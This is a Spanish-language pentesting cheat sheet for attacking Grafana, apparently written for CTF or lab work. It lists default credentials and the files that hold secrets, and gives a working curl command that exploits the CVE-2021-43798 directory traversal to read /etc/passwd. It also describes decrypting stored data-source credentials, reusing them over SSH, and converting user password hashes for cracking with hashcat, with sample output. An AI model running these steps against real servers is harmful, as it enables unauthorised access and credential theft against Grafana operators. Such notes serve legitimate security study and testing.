Credenciales Por Defecto

1 2	admin:admin admin:prom-operator

Archivos interesantes

1 2	/etc/grafana/grafana.ini # admin_user y admin_password (secretKey) /var/lib/grafana/grafana.db # Mirar la tabla data_source

CVE 2021-43798

Existe un exploit para Grafana 8.3.0 este permite realizar un directory traversal a partir del directorio de los plugins; para acceder a los anteriores archivos, aunque también se puede realizar con curl:

1	curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../etc/passwd -o passwd

Recomiendo primero probar el exploit de ExploitDB y modificarlo para saber que plugin utiliza, así podremos descargar la base de datos.

Grafana Decryptor

Teniendo acceso a la DB y a gafana.ini, podemos desencriptar los archivos de Grafana con el siguiente script en python:
Grafana Decryptor for CVE 2021-43798.
Estas credenciales pueden utilizarse contra ssh (verificar los usuarios de la maquina con curl al /etc/passwd).

Grafana2hashcat

Permite convertir los hashes de usuarios de la base de datos a algo entendible para hashcat:
Grafana2Hashcat
Uso:

# El hash tiene que tener la siguiente estructura (hash,salt)
3ad31dc57a7452c442f259cfff7aa61f2a6cea88ee634724ae146e221ae4e01c56c8bcbb3552310acd2fd746a396d2f99bf8,pepper

user@host:~$ cat grafana_hash.txt
3ad31dc57a7452c442f259cfff7aa61f2a6cea88ee634724ae146e221ae4e01c56c8bcbb3552310acd2fd746a396d2f99bf8,pepper

# Convertimos el hash
user@host:~$ python3 grafana2hashcat.py grafana_hash.txt

[+] Grafana2Hashcat
[+] Reading Grafana hashes from:  ./grafana_hash.txt
[+] Done! Read 3 hashes in total.
[+] Converting hashes...
[+] Converting hashes complete.
[*] Outfile was not declared, printing output to stdout instead.

sha256:10000:cGVwcGVy:OtMdxXp0UsRC8lnP/3qmHyps6ojuY0ckrhRuIhrk4BxWyLy7NVIxCs0v10ajltL5m/g=

[+] Now, you can run Hashcat with the following command, for example:

hashcat -m 10900 hashcat_hash.txt --wordlist wordlist.txt

Otros Recursos

Grafana Pentesting
0xss0rz Grafana
Hacktricks Grafana